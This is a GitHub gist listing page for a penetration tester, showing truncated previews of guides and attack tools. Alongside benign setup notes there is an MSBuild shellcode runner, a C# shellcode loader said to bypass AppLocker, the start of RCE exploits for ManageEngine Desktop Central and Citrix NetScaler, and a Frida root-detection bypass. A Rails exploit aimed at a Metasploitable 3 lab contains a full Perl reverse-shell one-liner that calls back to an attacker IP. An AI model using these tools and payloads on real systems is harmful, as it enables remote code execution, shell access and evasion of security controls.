LongCat pich4ya
@pich4ya
pich4ya / gist:1ac125726e4f79c6832899e6c9b7bde1
Last active Jan 29, 2021
How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
View gist:1ac125726e4f79c6832899e6c9b7bde1
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# How to MITM an iOS app's Web API via macOS -> Burp Suite when the app is proxy-unaware
# (e.g. Xamarin or Flutter apps, which do not go through the System Proxy and do not use the default Cert Store on the iPhone)
# For a normal app that already uses the system proxy, this method is not needed; just configure the proxy as usual
1. Plug the (jailbroken) iPhone into the MBP over USB, then use iproxy so that local port 8080 on the iPhone is forwarded to local port 8080 on the MBP through an ssh tunnel
$ brew install usbmuxd
$ iproxy 2222 22 & disown && ssh -R 8080:localhost:8080 -p 2222 root@127.0.0.1 -N -f
@pich4ya
pich4ya / fix_virtualenv
Created May 16, 2020 — forked from tevino/fix_virtualenv
Fix python virtualenv after python update
View fix_virtualenv
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
BAD_ENV_PATHS="/usr/local"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
@pich4ya
pich4ya / magisk_pixel3a.txt
Last active May 16, 2020
Clean Flash Magisk on Pixel 3a (Android 9)
View magisk_pixel3a.txt
@author LongCat (Pichaya Morimoto)
1. Enable ADB
Settings > About Phone > Tap on the "Build Number" entry 7 times
Settings > System > Advanced > Developer options > Enable "USB debugging"
Settings > System > Advanced > Developer options > Enable "OEM unlocking"
Note: If you cannot enable "OEM unlocking", then you are out of luck - Buy the new one :)
Connect Pixel 3a to MBP > allow access in the device's prompt.
@pich4ya
pich4ya / shellcode.xml
Created May 1, 2020 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
View shellcode.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@pich4ya
pich4ya / Shellcode.cs
Created May 1, 2020 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View src-2020-0011.py
#!/usr/local/bin/python3
"""
ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability
Download: https://www.manageengine.com/products/desktop-central/download-free.html
File ...: ManageEngine_DesktopCentral_64bit.exe
SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
Found by: mr_me
Date ...: 2019-12-12
CVE ....: CVE-2020-10189
@pich4ya
pich4ya / readme_render_exploit.py
Last active Feb 8, 2020
Fix broken rails_dynamic_render_code_exec's exploit against Metasploitable 3
View readme_render_exploit.py
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for Metasploitable 3 - render params[:os] 's RCE
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
# This exploit slightly adjusts the temporary file extension to an empty string
import requests
# 1. tmp upload
host = "172.28.128.3"
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
@pich4ya
pich4ya / netscaler_exploit.py
Created Jan 19, 2020 — forked from 0x09AL/netscaler_exploit.py
Citrix ADC / NetScaler Remote Command Execution
View netscaler_exploit.py
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
    endpoint = url + "/vpns/portal/scripts/newbm.pl"
@pich4ya
pich4ya / secureRootCert1.java
Last active Nov 29, 2019
How to avoid trusting all HTTPS certs when connecting to an internal API whose API server uses a cert issued by an internal root CA
View secureRootCert1.java
/*
Requirements
- Make sure you already have the root certificate file
- Set $JAVA_HOME correctly and make sure the file $JAVA_HOME/jre/lib/security/cacerts exists
- The Java keystore password is changeit by default
Steps
1. First download or request the root certificate you are going to use
Root certificates contain public information and CAs always make them available for anyone.
$ wget https://sth.sh/demo/STH_Root_CA.pem -O ca.pem
@pich4ya
pich4ya / root_bypass.js
Created Aug 5, 2019
Bypass Android Root Detection / Bypass RootBeer - August 2019
View root_bypass.js
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",